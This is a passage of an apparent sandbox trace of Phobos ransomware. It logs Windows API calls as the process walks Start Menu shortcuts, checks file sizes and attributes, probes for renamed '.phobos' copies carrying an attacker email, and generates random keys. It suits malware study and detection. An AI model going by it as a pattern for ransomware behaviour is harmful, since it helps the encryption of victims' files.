map.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.664] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.664] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.664] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.673] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1290) returned 1 [0122.673] CloseHandle (hObject=0x334) returned 1 [0122.673] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk")) returned 0x20 [0122.673] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.673] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.673] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.673] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.674] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1252) returned 1 [0122.674] CloseHandle (hObject=0x334) returned 1 [0122.674] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk")) returned 0x20 [0122.674] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.674] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.674] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.674] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.675] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1242) returned 1 [0122.675] CloseHandle (hObject=0x334) returned 1 [0122.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk")) returned 0x20 [0122.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.675] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.675] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.675] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system information.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.676] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1250) returned 1 [0122.676] CloseHandle (hObject=0x334) returned 1 [0122.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system information.lnk")) returned 0x20 [0122.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system information.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.676] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system information.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.676] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.676] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system restore.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.681] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1246) returned 1 [0122.681] CloseHandle (hObject=0x334) returned 1 [0122.681] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system restore.lnk")) returned 0x20 [0122.681] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system restore.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.681] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system restore.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.682] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.682] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.682] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1268) returned 1 [0122.682] CloseHandle (hObject=0x334) returned 1 [0122.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk")) returned 0x20 [0122.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.682] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.682] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.683] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.683] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1320) returned 1 [0122.683] CloseHandle (hObject=0x334) returned 1 [0122.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk")) returned 0x20 [0122.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.683] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.683] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.683] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.684] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1316) returned 1 [0122.684] CloseHandle (hObject=0x334) returned 1 [0122.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk")) returned 0x20 [0122.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.684] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.684] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.684] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.684] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1436) returned 1 [0122.684] CloseHandle (hObject=0x334) returned 1 [0122.685] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk")) returned 0x20 [0122.685] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.685] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.685] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.685] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.685] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1386) returned 1 [0122.685] CloseHandle (hObject=0x334) returned 1 [0122.685] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk")) returned 0x20 [0122.685] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.686] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.686] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.686] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.686] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1316) returned 1 [0122.686] CloseHandle (hObject=0x334) returned 1 [0122.686] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk")) returned 0x20 [0122.686] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.686] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.687] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.687] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\welcome center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.687] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1579) returned 1 [0122.687] CloseHandle (hObject=0x334) returned 1 [0122.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\welcome center.lnk")) returned 0x20 [0122.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\welcome center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.687] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\welcome center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.687] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.688] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.688] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1989) returned 1 [0122.688] CloseHandle (hObject=0x334) returned 1 [0122.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk")) returned 0x20 [0122.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.688] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.688] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.688] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.689] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1468) returned 1 [0122.689] CloseHandle (hObject=0x334) returned 1 [0122.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk")) returned 0x20 [0122.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.689] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.689] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.689] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.691] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1468) returned 1 [0122.691] CloseHandle (hObject=0x334) returned 1 [0122.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk")) returned 0x20 [0122.692] GetFileAttributesW 